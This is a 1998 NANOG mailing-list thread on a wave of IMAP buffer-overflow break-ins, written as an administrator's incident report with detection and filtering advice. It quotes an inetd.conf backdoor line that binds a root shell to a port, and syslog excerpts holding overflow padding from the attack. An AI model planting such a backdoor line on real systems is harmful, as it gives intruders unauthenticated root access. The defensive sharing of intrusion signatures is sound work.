IMAP attacks continue
Alex P. Rudnev
alex at Relcom.EU.net
Tue Nov 24 11:26:06 UTC 1998
It was not a hacker, it was the lamer. If it was the hacker, the simple
checks you have produce did not show anything wrong.
On Mon, 23 Nov 1998, Phil Howard wrote:
> Date: Mon, 23 Nov 1998 07:39:57 -0600 (CST)
> From: Phil Howard <phil at whistler.intur.net>
> To: Daniel Senie <dts at senie.com>
> Cc: nanog at merit.edu
> Subject: Re: IMAP attacks continue
>
> Daniel Senie wrote:
>
> > The frequency of IMAP attacks is increasing, and the number of IP
> > addresses scanned per attack seems to be increasing as well. In the last
> > 24 hours, I've been scanned by:
> >
> > fermi.math.csi.cuny.edu
> > c149.lib.uci.edu
> > sockeye.cob.calpoly.edu
> > quebec.upa.qc.ca
> >
> > Anyone upstream of any of these able to add a Sniffer? It'd be
> > interesting to see if someone is connected in via telnet or ssh and
> > launching the attacks remotely. With all of these types of attack in the
> > last several days, the systems doing the attacking have all been ones
> > that were compromised.
>
> I found a machine that had Red Hat 5.1 unmodified running on it, and it
> got hit. So I closed things off and looked around for damage and found
> the following:
>
> 1. Syslogd had been killed off and the syslog file deleted.
>
> 2. A backdoor was installed in /etc/inetd.conf as follows:
>
> ttalk stream tcp nowait root /bin/sh sh -i
>
> I've temporarily added filters to block TCP ports 143 and 666 coming in
> to my network (will have to open 143 back up if any of my customers are
> using IMAP to their own servers from outside, but we don't do IMAP, yet,
> so it's not an impact on me). Whether or not it is practical to do it
> on your network is something you'll have to figure out. But I would
> check any machines you have that might be at risk for these intrusion
> signatures. I can't imagine any reason anyone would execute any shell
> from inetd, so if you find /bin/*sh in inetd.conf, worry (and take it
> out).
>
> I don't know if these attacks are specific to Red Hat Linux or if other
> UNIX systems are at risk. My Sparc/Linux box logged at attempted attack
> that failed, possibly because the architecture wouldn't run the binary
> code the attacker put in the buffer overflow. This is what I found in
> the log (times are CST with NTP running):
>
> Nov 20 14:55:07 rigel pam[6172]: pam_get_user: no username obtained
> Nov 20 14:55:56 rigel imapd[6174]: System break-in attempt, host=1Cust149.tnt1.new-york.ny.da.uu.net [208.250.139.149]
> Nov 20 14:55:56 rigel
> Nov 20 14:55:56 rigel syslogd: Cannot glue message parts together
> Nov 20 14:55:56 rigel 22>Nov 20 14:55:56 imapd[6174]: AUTHENTICATE ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P!
!
^P!
> !
> !
> !
> ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
> Nov 20 14:55:56 rigel ^IF^L0^K^Is^MN^H^MV^LM
> Nov 20 15:16:43 rigel imapd[6209]: System break-in attempt, host=usr3-20.gdi.net [209.26.33.148]
> Nov 20 15:16:43 rigel syslogd: Cannot glue message parts together
> Nov 20 15:16:44 rigel ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^Pk8^
>
> --
> -- *-----------------------------* Phil Howard KA9WGN * --
> -- | Inturnet, Inc. | Director of Internet Services | --
> -- | Business Internet Solutions | eng at intur.net | --
> -- *-----------------------------* philh at intur.net * --
>
Aleksei Roudnev, Network Operations Center, Relcom, Moscow
(+7 095) 194-19-95 (Network Operations Center Hot Line),(+7 095) 239-10-10, N 13729 (pager)
(+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)
More information about the NANOG
mailing list